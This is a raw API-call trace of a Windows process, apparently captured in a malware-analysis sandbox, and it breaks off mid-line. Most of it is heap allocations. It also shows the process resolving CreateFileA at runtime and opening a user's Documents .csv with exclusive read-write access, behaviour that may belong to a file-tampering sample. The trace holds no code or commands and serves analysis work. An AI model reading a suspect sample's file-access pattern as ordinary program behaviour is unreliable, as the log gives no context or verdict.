[0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.370] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.371] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.371] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.371] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.372] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.372] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.373] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.373] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889610 [0036.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.374] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889610 [0036.374] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.374] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0036.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", cchWideChar=69, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 69 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x45) returned 0x88e138 [0036.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", cchWideChar=69, lpMultiByteStr=0x88e138, cbMultiByte=69, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv", lpUsedDefaultChar=0x0) returned 69 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.375] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\pm4n5-.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.375] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8a) returned 0x7c38b0 [0036.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=69, lpWideCharStr=0x7c38b0, cchWideChar=69 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\PM4N5-.csv") returned 69 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.376] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.376] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.377] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0036.377] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.377] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.378] HeapFree (in: hHeap=0x770000, 